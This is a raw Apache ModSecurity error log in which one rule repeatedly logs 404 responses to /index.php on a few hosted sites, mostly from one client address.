[Tue May 26 15:29:11.957712 2026] [security2:error] [pid 715645:tid 715813] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu73VGgMGh8k213Rj9uQAAACY"]
[Tue May 26 15:29:12.159735 2026] [security2:error] [pid 715645:tid 715856] [client 103.151.173.206:61254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahVu73VGgMGh8k213Rj9ogAAAEY"]
[Tue May 26 15:29:12.565521 2026] [security2:error] [pid 715645:tid 715664] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj98wAABRI"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.565812 2026] [security2:error] [pid 715645:tid 715866] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj99AAAWzE"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.569537 2026] [security2:error] [pid 715645:tid 715883] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj99QAAbBU"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.569547 2026] [security2:error] [pid 715645:tid 715852] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj98gAAAE0"]
[Tue May 26 15:29:12.717286 2026] [security2:error] [pid 715645:tid 715802] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-BgAAGxs"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.723051 2026] [security2:error] [pid 715645:tid 715825] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj9_wAAMmc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.734869 2026] [security2:error] [pid 715645:tid 715811] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-CAAAJDQ"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.739977 2026] [security2:error] [pid 715645:tid 715798] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-DwAAFxA"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.740374 2026] [security2:error] [pid 715645:tid 715830] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-FQAANyI"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.741810 2026] [security2:error] [pid 715645:tid 715689] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-AgAAeis"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.743744 2026] [security2:error] [pid 715645:tid 715678] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-GgAAPSA"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.747358 2026] [security2:error] [pid 715645:tid 715841] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-CgAAQh4"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.748465 2026] [security2:error] [pid 715645:tid 715829] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-AQAANi0"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.752162 2026] [security2:error] [pid 715645:tid 715819] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-HQAALDM"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.755661 2026] [security2:error] [pid 715645:tid 715782] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-DQAAB1s"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.757124 2026] [security2:error] [pid 715645:tid 715807] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-GQAAICM"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.760612 2026] [security2:error] [pid 715645:tid 715786] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-FwAAC2w"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.762142 2026] [security2:error] [pid 715645:tid 715889] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-EgAAcg8"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.766316 2026] [security2:error] [pid 715645:tid 715896] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-BQAAeQ4"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.770725 2026] [security2:error] [pid 715645:tid 715856] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-DgAAUSU"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.772935 2026] [security2:error] [pid 715645:tid 715882] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-FgAAay4"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.777420 2026] [security2:error] [pid 715645:tid 715894] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-EQAAdxE"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.780720 2026] [security2:error] [pid 715645:tid 715822] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-EwAAL1A"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.785018 2026] [security2:error] [pid 715645:tid 715876] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-AAAAZXE"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.785837 2026] [security2:error] [pid 715645:tid 715859] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-IQAAVB0"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.790433 2026] [security2:error] [pid 715645:tid 715863] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-HwAAWCk"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.790786 2026] [security2:error] [pid 715645:tid 715808] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-GwAAIS8"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.800700 2026] [security2:error] [pid 715645:tid 715901] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-DAAAfkA"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.802218 2026] [security2:error] [pid 715645:tid 715787] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-BwAADBM"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.804223 2026] [security2:error] [pid 715645:tid 715810] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-EAAAI2A"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.806708 2026] [security2:error] [pid 715645:tid 715817] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-CwAAKhc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.815968 2026] [security2:error] [pid 715645:tid 715839] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-AwAAQB8"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.818062 2026] [security2:error] [pid 715645:tid 715840] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-BAAAQSo"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.819468 2026] [security2:error] [pid 715645:tid 715888] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-JwAAcTg"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.821855 2026] [security2:error] [pid 715645:tid 715902] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-IwAAfyg"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.823313 2026] [security2:error] [pid 715645:tid 715781] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-CQAABgc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.828594 2026] [security2:error] [pid 715645:tid 715853] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-HAAATlE"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.829603 2026] [security2:error] [pid 715645:tid 715797] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-GAAAFiY"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.837148 2026] [security2:error] [pid 715645:tid 715790] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-LgAADyw"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.840831 2026] [security2:error] [pid 715645:tid 715844] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-KQAARSQ"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.841803 2026] [security2:error] [pid 715645:tid 715831] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-JgAAODo"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.843296 2026] [security2:error] [pid 715645:tid 715732] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-NAAAfFY"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.843649 2026] [security2:error] [pid 715645:tid 715824] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-JAAAMSc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.844279 2026] [security2:error] [pid 715645:tid 715846] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-IAAARzA"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.847998 2026] [security2:error] [pid 715645:tid 715832] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-HgAAOWM"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.851810 2026] [security2:error] [pid 715645:tid 715864] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-KAAAWU4"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.857345 2026] [security2:error] [pid 715645:tid 715861] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-KgAAVkc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.860147 2026] [security2:error] [pid 715645:tid 715849] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-MQAASgU"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.860925 2026] [security2:error] [pid 715645:tid 715867] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-IgAAXDU"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.975282 2026] [security2:error] [pid 715645:tid 715857] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-KwAAUkU"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.979527 2026] [security2:error] [pid 715645:tid 715791] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-FAAAEGY"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.982952 2026] [security2:error] [pid 715645:tid 715784] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-LwAACUY"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.984050 2026] [security2:error] [pid 715645:tid 715884] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-MwAAbXg"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.985680 2026] [security2:error] [pid 715645:tid 715827] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-NwAANEg"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.989496 2026] [security2:error] [pid 715645:tid 715877] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-NQAAZlg"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.990766 2026] [security2:error] [pid 715645:tid 715719] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-OQAAU0k"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.992989 2026] [security2:error] [pid 715645:tid 715845] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-MgAARlc"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.995703 2026] [security2:error] [pid 715645:tid 715890] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-LQAAc08"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.996123 2026] [security2:error] [pid 715645:tid 715785] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-LAAACk0"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.996361 2026] [security2:error] [pid 715645:tid 715783] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-NgAACHw"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.996692 2026] [security2:error] [pid 715645:tid 715673] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-PQAALRs"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.997153 2026] [security2:error] [pid 715645:tid 715821] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-JQAALl0"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:12.998584 2026] [security2:error] [pid 715645:tid 715775] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-PwAAAAQ"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:13.000848 2026] [security2:error] [pid 715645:tid 715850] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-OwAASzY"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:13.004139 2026] [security2:error] [pid 715645:tid 715814] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-QAAAJzw"], referer: https://ndequipments.com/services/
[Tue May 26 15:29:13.004596 2026] [security2:error] [pid 715645:tid 715879] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-QwAAAGg"]
[Tue May 26 15:29:13.005558 2026] [security2:error] [pid 715645:tid 715847] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVu8HVGgMGh8k213Rj-PAAASEI"], referer: https://ndequipments.com/services/
